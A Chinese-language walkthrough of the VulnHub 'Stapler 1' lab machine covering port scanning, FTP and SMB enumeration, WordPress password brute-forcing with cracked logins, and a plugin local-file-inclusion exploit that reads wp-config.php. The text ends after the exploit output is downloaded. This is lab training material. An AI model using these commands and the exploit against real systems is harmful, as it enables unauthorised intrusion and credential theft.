Stapler

    • nmap扫描
    • 21 端口
    • 22 53端口
    • 80端口
      • 目录爆破
    • 139端口
    • 666 端口
    • 3306端口
    • 12380端口
    • 获取数据库root权限
    • 获取系统立足点
    • 提权
  • 其他思路
    • 系统立足点1
    • 系统立足点2
    • 提权1
    • 提权2

https://www.vulnhub.com/entry/stapler-1,150/
靶机ip:192.168.54.27
kali ip:192.168.54.128

nmap扫描

# Nmap 7.93 scan initiated Sun May 28 17:41:37 2023 as: nmap --min-rate 20000 -p- -oN nmap/ports 192.168.54.27
Nmap scan report for 192.168.54.27
Host is up (0.00026s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:A7:37:64 (VMware)# Nmap done at Sun May 28 17:41:44 2023 -- 1 IP address (1 host up) scanned in 7.02 second

# Nmap 7.93 scan initiated Sun May 28 17:43:35 2023 as: nmap -sT --min-rate 20000 -p- -oN nmap/tcp 192.168.54.27
Nmap scan report for 192.168.54.27
Host is up (0.0050s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   closed doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:A7:37:64 (VMware)# Nmap done at Sun May 28 17:43:51 2023 -- 1 IP address (1 host up) scanned in 16.06 seconds

# yunki @ yunki in ~/oscp/7.Stapler1 [9:30:42]
$ cat nmap/udp
# Nmap 7.93 scan initiated Sun May 28 17:43:59 2023 as: nmap -sU --min-rate 20000 -p- -oN nmap/udp 192.168.54.27
Warning: 192.168.54.27 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.54.27
Host is up (0.039s latency).
Not shown: 65488 open|filtered udp ports (no-response), 44 closed udp ports (port-unreach)
PORT      STATE SERVICE
53/udp    open  domain
137/udp   open  netbios-ns
59771/udp open  unknown
MAC Address: 00:0C:29:A7:37:64 (VMware)# Nmap done at Sun May 28 17:44:40 2023 -- 1 IP address (1 host up) scanned in 40.42 seconds

$ cat nmap/ports | grep 'open' | awk -F '/' '{print $1}' | tr '\n' ','
21,22,53,80,139,666,3306,12380,%

# Nmap 7.93 scan initiated Sun May 28 17:43:17 2023 as: nmap -sT -sC -sV -O -p21,22,53,80,139,666,3306,12380 -oN nmap/details 192.168.54.27
Nmap scan report for 192.168.54.27
Host is up (0.00043s latency).PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.0.8 or later
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.54.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8121cea11a05b1694f4ded8028e89905 (RSA)
|   256 5ba5bb67911a51c2d321dac0caf0db9e (ECDSA)
|_  256 6d01b773acb0936ffab989e6ae3cabd3 (ED25519)
53/tcp    open  domain      dnsmasq 2.75
| dns-nsid:
|_  bind.version: dnsmasq-2.75
80/tcp    open  http        PHP cli server 5.5 or later
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp   open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open  doom?
| fingerprint-strings:
|   NULL:
|     message2.jpgUT
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open  mysql       MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 8
|   Capabilities flags: 63487
|   Some Capabilities: LongColumnFlag, SupportsTransactions, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, Support41Auth, Speaks41ProtocolOld, SupportsCompression, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, LongPassword, InteractiveClient, IgnoreSigpipes, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: \x01\x1E>b p\x19:C\x05\x0CI`|1>\x0F\x0Fxp
|_  Auth Plugin Name: mysql_native_password
12380/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:A7:37:64 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2023-05-28T18:41:52+01:00
|_clock-skew: mean: 7h38m18s, deviation: 34m37s, median: 7h58m17s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2023-05-28T17:41:52
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 28 17:44:14 2023 -- 1 IP address (1 host up) scanned in 57.29 seconds

# Nmap 7.93 scan initiated Sun May 28 17:44:58 2023 as: nmap --script=vuln -p21,22,53,80,139,666,3306,12380 -oN nmap/vuln 192.168.54.27
Nmap scan report for 192.168.54.27
Host is up (0.00044s latency).PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp   open  netbios-ssn
666/tcp   open  doom
3306/tcp  open  mysql
12380/tcp open  unknown
MAC Address: 00:0C:29:A7:37:64 (VMware)Host script results:
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false# Nmap done at Sun May 28 17:53:39 2023 -- 1 IP address (1 host up) scanned in 521.66 seconds

21 端口

根据nmap/details可以知道21端口运行 vsftpd 2.0.8 or later服务。

# yunki @ yunki in ~/oscp/7.Stapler1 [9:32:31]
$ mkdir 21      # yunki @ yunki in ~/oscp/7.Stapler1 [9:32:34]
$ cd 21        # yunki @ yunki in ~/oscp/7.Stapler1/21 [9:32:35]
$ ftp 192.168.54.27
Connected to 192.168.54.27.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.54.27:yunki): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> prompt
Interactive mode off.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.06 secs (1.7169 kB/s)
ftp> bye
221 Goodbye.# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:32:58]
$ ls
note# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:32:59]
$ cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

获取到一段文字,其中有两个用户,放到字典里。

# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:35:29]
$ echo "elly\njohn" >> ../names.list# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:35:48]
$ cat ../names.list
elly
john

# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:36:36]
$ searchsploit vsftpd 2.0
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                                            | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                                            | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                                            | windows/dos/31819.pl
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

再使用searchsploit扫描一下,发现三个只能在dos下使用的脚本,pass,下一个端口。

22 53端口

22端口运行ssh服务,信息收集顺序靠后,
53端口运行dnsmasq 2.75服务,不太熟悉,没有突破口再回来看这个是否有信息。

80端口

目录爆破

# yunki @ yunki in ~/oscp/7.Stapler1/80 [9:51:21]
$ dirsearch -u 192.168.54.27                    _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                            (_||| _) (/_(_|| (_| )                                                                                                                                                     Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/yunki/.dirsearch/reports/192.168.54.27_23-05-29_09-51-27.txtError Log: /home/yunki/.dirsearch/logs/errors-23-05-29_09-51-27.logTarget: http://192.168.54.27/[09:51:27] Starting:
[09:51:28] 200 -  220B  - /.bash_logout
[09:51:28] 200 -    4KB - /.bashrc
[09:51:31] 200 -  675B  - /.profile                                        Task Completed

都下载下来看看,没有什么敏感信息。

139端口

samba服务

# yunki @ yunki in ~/oscp/7.Stapler1/139 [9:55:28] C:1
$ smbclient -L 192.168.54.27
Password for [WORKGROUP\yunki]:Sharename       Type      Comment---------       ----      -------print$          Disk      Printer Driverskathy           Disk      Fred, What are we doing here?tmp             Disk      All temporary files should be stored hereIPC$            IPC       IPC Service (red server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available# yunki @ yunki in ~/oscp/7.Stapler1/139 [9:55:46]
$ smbclient //192.168.54.27/kathy
Password for [WORKGROUP\yunki]:
Try "help" to get a list of possible commands.
smb: \> ls.                                   D        0  Sat Jun  4 00:52:52 2016..                                  D        0  Tue Jun  7 05:39:56 2016kathy_stuff                         D        0  Sun Jun  5 23:02:27 2016backup                              D        0  Sun Jun  5 23:04:14 201619478204 blocks of size 1024. 16389168 blocks available
smb: \> prompt
smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls.                                   D        0  Sun Jun  5 23:02:27 2016..                                  D        0  Sat Jun  4 00:52:52 2016todo-list.txt                       N       64  Sun Jun  5 23:02:27 201619478204 blocks of size 1024. 16389168 blocks available
smb: \kathy_stuff\> get todo-list.txt
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (12.5 KiloBytes/sec) (average 12.5 KiloBytes/sec)
smb: \kathy_stuff\> cd ..
smb: \> ls.                                   D        0  Sat Jun  4 00:52:52 2016..                                  D        0  Tue Jun  7 05:39:56 2016kathy_stuff                         D        0  Sun Jun  5 23:02:27 2016backup                              D        0  Sun Jun  5 23:04:14 201619478204 blocks of size 1024. 16389168 blocks available
smb: \> cd backup
smb: \backup\> ls.                                   D        0  Sun Jun  5 23:04:14 2016..                                  D        0  Sat Jun  4 00:52:52 2016vsftpd.conf                         N     5961  Sun Jun  5 23:03:45 2016wordpress-4.tar.gz                  N  6321767  Tue Apr 28 01:14:46 201519478204 blocks of size 1024. 16389168 blocks available
smb: \backup\> get vsftpd.conf
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (1940.4 KiloBytes/sec) (average 735.5 KiloBytes/sec)
smb: \backup\> get wordpress-4.tar.gz
getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (41713.5 KiloBytes/sec) (average 39612.1 KiloBytes/sec)
smb: \backup\> cd ..
smb: \> ls.                                   D        0  Sat Jun  4 00:52:52 2016..                                  D        0  Tue Jun  7 05:39:56 2016kathy_stuff                         D        0  Sun Jun  5 23:02:27 2016backup                              D        0  Sun Jun  5 23:04:14 201619478204 blocks of size 1024. 16389168 blocks available
smb: \> exit# yunki @ yunki in ~/oscp/7.Stapler1/139 [9:56:34]
$ smbclient //192.168.54.27/tmp
Password for [WORKGROUP\yunki]:
Try "help" to get a list of possible commands.
smb: \> ls.                                   D        0  Mon May 29 01:49:49 2023..                                  D        0  Tue Jun  7 05:39:56 2016ls                                  N      274  Sun Jun  5 23:32:58 201619478204 blocks of size 1024. 16389168 blocks available
smb: \> get ls
getting file \ls of size 274 as ls (89.2 KiloBytes/sec) (average 89.2 KiloBytes/sec)
smb: \> exit# yunki @ yunki in ~/oscp/7.Stapler1/139 [9:56:45]
$ ls
ls  todo-list.txt  vsftpd.conf  wordpress-4.tar.gz

一共有两个共享文件夹,kathy和tmp,都下载下来。

666 端口

根据details文件,发现666端口会返回一些东西,看到有个jpe,可能是个图片。用nc去接收一下。

# yunki @ yunki in ~/oscp/7.Stapler1 [10:04:23]
$ cd 666                         # yunki @ yunki in ~/oscp/7.Stapler1/666 [10:07:55]
$ nc 192.168.54.27 666 >> file   # yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:02]
$ file file
file: Zip archive data, at least v2.0 to extract, compression method=deflate# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:08]
$ mv file file.zip # yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:23]
$ unzip file.zip
Archive:  file.zipinflating: message2.jpg            # yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:29]
$ ls
file.zip  message2.jpg# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:31]
$ xdg-open message2.jpg


发现个用户,写入到names.list中。

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:36]
$ cat ../names.list
elly
john# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:09:55]
$ echo "scott" >> ../names.list # yunki @ yunki in ~/oscp/7.Stapler1/666 [10:10:22]
$ cat ../names.list
elly
john
scott

3306端口

一样,优先级靠后

12380端口

发现也是个http服务,看看主页。
发现输入扫描目录都是该页面,例如/robots.txt等。右键查看源代码。发现注释。
![在这里插入图片描述](https://img-blog.csdnimg.cn/da5519cf116d4c049bda6984549508b4.png

# yunki @ yunki in ~/oscp/7.Stapler1 [10:21:15]
$ echo 'zoe' >> names.list                         # yunki @ yunki in ~/oscp/7.Stapler1 [10:21:21]
$ cat names.list
elly
john
scott
zoe

同样爆破一下。

# yunki @ yunki in ~/oscp/7.Stapler1 [10:16:52]
$ dirsearch -u 192.168.54.27:12380
/usr/lib/python3/dist-packages/requests/__init__.py:87: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0) doesn't match a supported version!warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "_|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                            (_||| _) (/_(_|| (_| )                                                                                                                                                     Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/yunki/.dirsearch/reports/192.168.54.27-12380_23-05-29_10-17-44.txtError Log: /home/yunki/.dirsearch/logs/errors-23-05-29_10-17-44.logTarget: http://192.168.54.27:12380/[10:17:44] Starting:

爆破的同时,继续信息收集,抓包看看。

发现是400 bad request,那可能是请求头错误,协议有问题。换成https试一试。

https爆破一下

# yunki @ yunki in ~/oscp/7.Stapler1 [10:31:18]
$ dirsearch -u https://192.168.54.27:12380/
/usr/lib/python3/dist-packages/requests/__init__.py:87: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0) doesn't match a supported version!warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "_|. _ _  _  _  _ _|_    v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/yunki/.dirsearch/reports/192.168.54.27-12380/-_23-05-29_10-31-27.txtError Log: /home/yunki/.dirsearch/logs/errors-23-05-29_10-31-27.logTarget: https://192.168.54.27:12380/[10:31:28] Starting:
[10:31:30] 403 -  302B  - /.ht_wsr.txt
[10:31:30] 403 -  305B  - /.htaccess.bak1
[10:31:30] 403 -  305B  - /.htaccess.orig
[10:31:30] 403 -  307B  - /.htaccess.sample
[10:31:30] 403 -  305B  - /.htaccess_orig
[10:31:30] 403 -  304B  - /.htaccessOLD2
[10:31:30] 403 -  306B  - /.htaccess_extra
[10:31:30] 403 -  303B  - /.htaccess_sc
[10:31:30] 403 -  303B  - /.htaccessBAK
[10:31:30] 403 -  303B  - /.htaccessOLD
[10:31:30] 403 -  295B  - /.htm
[10:31:30] 403 -  302B  - /.httr-oauth
[10:31:30] 403 -  301B  - /.htpasswds
[10:31:30] 403 -  305B  - /.htpasswd_test
[10:31:30] 403 -  305B  - /.htaccess.save
[10:31:30] 403 -  296B  - /.html
[10:31:31] 403 -  295B  - /.php
[10:31:31] 403 -  296B  - /.php3
[10:31:57] 200 -   21B  - /index.html
[10:31:58] 301 -  329B  - /javascript  ->  https://192.168.54.27:12380/javascript/
[10:32:05] 200 -   13KB - /phpmyadmin/doc/html/index.html
[10:32:06] 301 -  329B  - /phpmyadmin  ->  https://192.168.54.27:12380/phpmyadmin/
[10:32:07] 200 -   10KB - /phpmyadmin/
[10:32:07] 200 -   10KB - /phpmyadmin/index.php
[10:32:10] 200 -   59B  - /robots.txt
[10:32:11] 403 -  304B  - /server-status
[10:32:11] 403 -  305B  - /server-status/                                   Task Completed

发现路径。访问!



发现是个wordpress服务??wpscan扫描!

# yunki @ yunki in ~/oscp/7.Stapler1 [11:04:01] C:2
$ wpscan --url https://192.168.54.27:12380/blogblog/  --disable-tls-checks -P /usr/share/wordlists/rockyou.txt
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.22Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: https://192.168.54.27:12380/blogblog/ [192.168.54.27]
[+] Started: Mon May 29 11:04:07 2023Interesting Finding(s):
....
skips
....[i] User(s) Identified:[+] John Smith| Found By: Author Posts - Display Name (Passive Detection)| Confirmed By: Rss Generator (Passive Detection)[+] peter| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] elly| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] heather| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] john| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] barry| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] garry| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] harry| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] scott| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] kathy| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] tim| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] Performing password attack on Xmlrpc Multicall against 11 user/s
[SUCCESS] - garry / football
[SUCCESS] - harry / monkey
[SUCCESS] - scott / cookie
[SUCCESS] - kathy / coolgirl

爆破出用户,拿去ssh登录发现都不对。那就后台登录,可以登录但没有什么可以利用的。那就搜索一下wp使用的插件,看看有没有漏洞。

# yunki @ yunki in ~/oscp/7.Stapler1 [11:12:21] C:1
$ wpscan --url https://192.168.54.27:12380/blogblog/  --disable-tls-checks -e ap --plugins-detection aggressive
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.22Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: https://192.168.54.27:12380/blogblog/ [192.168.54.27]
[+] Started: Mon May 29 11:12:40 2023Interesting Finding(s):
...
...
skips
...
...[+] Enumerating All Plugins (via Aggressive Methods)Checking Known Locations - Time: 00:03:43 <======================================================================================> (103211 / 103211) 100.00% Time: 00:03:43
[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:[+] advanced-video-embed-embed-videos-or-playlists| Location: https://192.168.54.27:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/| Latest Version: 1.0 (up to date)| Last Updated: 2015-10-14T13:52:00.000Z| Readme: https://192.168.54.27:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt| [!] Directory listing is enabled|| Found By: Known Locations (Aggressive Detection)|  - https://192.168.54.27:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200|| Version: 1.0 (80% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)|  - https://192.168.54.27:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt[+] akismet| Location: https://192.168.54.27:12380/blogblog/wp-content/plugins/akismet/| Latest Version: 5.1| Last Updated: 2023-04-05T10:17:00.000Z|| Found By: Known Locations (Aggressive Detection)|  - https://192.168.54.27:12380/blogblog/wp-content/plugins/akismet/, status: 403|| The version could not be determined.[+] shortcode-ui| Location: https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/| Last Updated: 2019-01-16T22:56:00.000Z| Readme: https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt| [!] The version is out of date, the latest version is 0.7.4| [!] Directory listing is enabled|| Found By: Known Locations (Aggressive Detection)|  - https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200|| Version: 0.6.2 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)|  - https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)|  - https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt[+] two-factor| Location: https://192.168.54.27:12380/blogblog/wp-content/plugins/two-factor/| Latest Version: 0.8.0| Last Updated: 2023-03-27T09:14:00.000Z| Readme: https://192.168.54.27:12380/blogblog/wp-content/plugins/two-factor/readme.txt| [!] Directory listing is enabled|| Found By: Known Locations (Aggressive Detection)|  - https://192.168.54.27:12380/blogblog/wp-content/plugins/two-factor/, status: 200|| The version could not be determined.[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Mon May 29 11:16:49 2023
[+] Requests Done: 103263
[+] Cached Requests: 13
[+] Data Sent: 30.578 MB
[+] Data Received: 13.971 MB
[+] Memory used: 529.801 MB
[+] Elapsed time: 00:04:08

发现使用了好多插件,用searchsploit搜索一下。

# yunki @ yunki in ~/oscp/7.Stapler1 [11:18:26]
$ searchsploit advanced video
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                | php/webapps/39646.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results# yunki @ yunki in ~/oscp/7.Stapler1 [11:18:33]
$ searchsploit -m 39646      Exploit: WordPress Plugin Advanced Video 1.0 - Local File InclusionURL: https://www.exploit-db.com/exploits/39646Path: /usr/share/exploitdb/exploits/php/webapps/39646.pyCodes: N/AVerified: True
File Type: Python script, ASCII text executable
Copied to: /home/yunki/oscp/7.Stapler1/39646.py# yunki @ yunki in ~/oscp/7.Stapler1 [11:18:42]
$ vim 39646.py

修改如下信息。

运行文件,发现报错

# yunki @ yunki in ~/oscp/7.Stapler1 [11:20:36]
$ python 39646.py
Traceback (most recent call last):File "39646.py", line 41, in <module>objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')File "/usr/lib/python2.7/urllib2.py", line 154, in urlopenreturn opener.open(url, data, timeout)File "/usr/lib/python2.7/urllib2.py", line 429, in openresponse = self._open(req, data)File "/usr/lib/python2.7/urllib2.py", line 447, in _open'_open', req)File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chainresult = func(*args)File "/usr/lib/python2.7/urllib2.py", line 1248, in https_opencontext=self._context)File "/usr/lib/python2.7/urllib2.py", line 1205, in do_openraise URLError(err)
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:733)>

可能是ssl问题,加入代码。

import sslssl._create_default_https_context = ssl._create_unverified_context

重新运行。

# yunki @ yunki in ~/oscp/7.Stapler1 [11:22:48]
$ python 39646.py

在uploads文件夹里发现刚才执行生成的文件。

# yunki @ yunki in ~/oscp/7.Stapler1 [11:26:12] C:5
$ wget https://192.168.54.27:12380/blogblog/wp-content/uploads/1320375804.jpeg
--2023-05-29 11:26:19--  https://192.168.54.27:12380/blogblog/wp-content/uploads/1320375804.jpeg
正在连接 192.168.54.27:12380... 已连接。
错误: “192.168.54.27” 的证书不可信。
错误: “192.168.54.27” 的证书颁发者未知。
证书所有者与主机名 “192.168.54.27” 不符# yunki @ yunki in ~/oscp/7.Stapler1 [11:26:19] C:5
$ wget -h | grep -i 'cert'                                                                                                                         --no-check-certificate       不要验证服务器的证书。--certificate=文件           客户端证书文件。--certificate-type=类型      客户端证书类型,PEM 或 DER。--ca-certificate=文件        带有一组 CA 证书的文件。--ca-certificate=文件        带有一组 CA 证书的文件。# yunki @ yunki in ~/oscp/7.Stapler1 [11:26:34]
$ wget https://192.168.54.27:12380/blogblog/wp-content/uploads/1320375804.jpeg --no-check-certificate
--2023-05-29 11:26:48--  https://192.168.54.27:12380/blogblog/wp-content/uploads/1320375804.jpeg
正在连接 192.168.54.27:12380... 已连接。
警告: “192.168.54.27” 的证书不可信。
警告: “192.168.54.27” 的证书颁发者未知。
证书所有者与主机名 “192.168.54.27” 不符
已发出 HTTP 请求,正在等待回应... 200 OK
长度:3042 (3.0K) [image/jpeg]
正在保存至: “1320375804.jpeg”1320375804.jpeg                            100%[========================================================================================>]   2.97K  --.-KB/s  用时 0s      2023-05-29 11:26:48 (117 MB/s) - 已保存 “1320375804.jpeg” [3042/3042])# yunki @ yunki in ~/oscp/7.Stapler1 [11:26:48]
